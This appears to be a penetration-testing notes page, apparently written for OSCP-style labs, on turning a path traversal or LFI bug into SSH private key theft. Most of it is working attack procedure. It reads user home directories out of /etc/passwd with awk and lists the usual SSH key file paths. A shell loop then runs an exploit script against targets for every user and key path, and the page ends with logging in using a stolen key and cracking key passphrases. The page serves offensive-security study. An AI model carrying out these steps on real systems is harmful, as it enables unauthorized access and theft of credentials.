Fetching SSH Private Key

Assuming you have verified the presence of Path Traversal, directory traversal, or LFI.

We can fetch SSH Private key in Linux and then we can connect using that.

Way to Fetch

Step 1: Store the /etc/passwd content

root:x:0:0:root:/root:/bin/bash
offsec:x:1000:1000:Offsec Admin:/home/offsec:/bin/bash
miranda:x:1001:1001:Miranda:/home/miranda:/bin/sh
steven:x:1002:1002:Steven:/home/steven:/bin/sh
mark:x:1003:1003:Mark:/home/mark:/bin/sh
anita:x:1004:1004:Anita:/home/anita:/bin/sh
# Above are users to check for ssh key.
# Store the output in file names as passwd_list.txt

Step 2: Make a list of user present

# List of User for ssh key checking.
# Run command to automatically make the list.
awk -F: '($3 == 0 || $3 >= 1000) {print $6}' passwd_list.txt > user_list.txt
# user_list.txt
/root
/home/offsec
/home/miranda
/home/steven
/home/mark
/home/anita

Step 3: Make list of Names of SSH files in linux

# SSH key list (ssh_key.txt)
# Run command to automatically make the list.
echo "/.ssh/id_rsa\n/.ssh/id_rsa.keystore\n/.ssh/id_rsa.pub\n/.ssh/authorized_keys\n/.ssh/known_hosts\n/.ssh/id_ecdsa\n/.ssh/id_ecdsa.pub\n/.ssh/id_ed25519\n/.ssh/id_dsa" > ssh_key.txt
# you can check /etc/ssh/ssh_config location for names "IdentityFile"
# ssh_key.txt
/.ssh/id_rsa 
/.ssh/id_rsa.keystore 
/.ssh/id_rsa.pub 
/.ssh/authorized_keys 
/.ssh/known_hosts
/.ssh/id_ecdsa
/.ssh/id_ecdsa.pub
/.ssh/id_ed25519
/.ssh/id_dsa

Step 4: Checking for SSH Key


# Directly run the script in the terminal, It will store all result in file named as result_ssh.txt
while read -r user; do
    while read -r key; do
        echo "\n=====\n" >> result_ssh.txt
        echo "$user$key" >> result_ssh.txt
        ./50383.sh targets.txt "$user$key" >> result_ssh.txt
    done < ssh_key.txt
done < user_list.txt

# You have to modify the script according to the situation and need.
# Check for SSH key in file.

Got private ssh key ??

if yes !!! Try to connect to the system.

# Example
chmod 600 id_rsa
ssh -i id_rsa -p 2222 anita@$web01

Scenario 1: Getting error

if you are getting errors like error in libcrypto then try to format the id_rsa file. Use nano Editor for pasting content.

Scenario 2: Asking for password

If SSH is asking for a password then you need to crack it.

Refer to the link below for cracking:

PreviousDirectory Traversal NextFile Inclusion Vulnerability

Last updated 1 year ago

hashtagWay to Fetch

hashtagStep 1: Store the /etc/passwd content

hashtagStep 2: Make a list of user present

hashtagStep 3: Make list of Names of SSH files in linux

hashtagStep 4: Checking for SSH Key

hashtagGot private ssh key ??

hashtagScenario 1: Getting error

hashtagScenario 2: Asking for password